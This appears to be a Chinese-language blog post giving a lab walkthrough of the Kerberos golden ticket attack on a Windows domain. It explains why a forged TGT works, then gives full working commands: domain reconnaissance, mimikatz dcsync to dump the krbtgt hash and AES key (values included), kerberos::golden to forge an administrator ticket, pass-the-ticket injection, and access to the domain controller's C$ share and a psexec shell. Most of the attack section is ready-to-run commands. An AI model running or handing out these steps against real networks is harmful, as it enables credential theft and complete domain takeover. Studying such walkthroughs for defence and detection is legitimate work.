黄金票据

黄金票据

原理

在 AS-REP 阶段,由于返回的 TGT 认购权证是由 krbtgt 用户的密码Hash加密的,因此如果我们拥有 krbtgt 的 hash 就可以自己制作一个TGT认购权证,这就造成了黄金票据攻击。

伪造黄金票据的条件:

  • 要伪造的域用户(这里我们一般填写域管理员账户administrator)

  • 域名

  • 域的SID值(就是域成员SID值去掉最后的)

  • krbtgt账号的哈希值或AES-256值

实验环境

域控:win2012R2 :10.211.55.30

域内主机:win7:10.211.55.32

实验演示

获取制作金票相关的信息

#获取域SID S-1-5-21-1582912704-266771287-3858088903
whoami /all
#获取域名 hacker.lab
ipconfig /all
#查询域管
net group "domain admins" /domain
#查询krbtgt的hash 这里直接用mimikatz获取 0c31bbe4f560ba40876ffc6a46cc939b
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:hacker.lab /user:krbtgt

#aes256_hmac(4096) : 46d46265a1caacfe02c95d1b998b368be33e275db3752110739a4b92777b5080

避免影响,先把票据清空

mimikatz # kerberos::purge
mimikatz # kerberos::list

制作黄金票据

#利用hash
mimikatz # kerberos::golden /user:administrator /domain:hacker.lab /sid:S-1-5-21-1582912704-266771287-3858088903 /krbtgt:0c31bbe4f560ba40876ffc6a46cc939b /ticket:golden1.kiribi
#利用aes256
mimikatz # kerberos::golden /user:administrator /domain:hacker.lab /sid:S-1-5-21-1582912704-266771287-3858088903 /aes256:46d46265a1caacfe02c95d1b998b368be33e275db3752110739a4b92777b5080 /ticket:golden2.kiribi

#参数说明:
  /user:伪造的用户名
  /domain:域名称
  /sid:SID值,注意是去掉最后一个-后面的值
  /krbtgt:krbtgt的HASH值
  /ticket:生成的票据名称

票据注入内存

#导入刚才生成的票据
mimikatz # kerberos::ptt golden1.kiribi
mimikatz # exit 
#导入成功后可获取域管权限在当前终端访问
#klist查看票据 klist purge清空
dir \\10.211.55.30\c$  


#可以远程获取shell
psexec.exe \\10.211.55.30 cmd.exe

posted @ 2022-08-12 16:44  九天揽月丶  阅读(144)  评论(0编辑  收藏  举报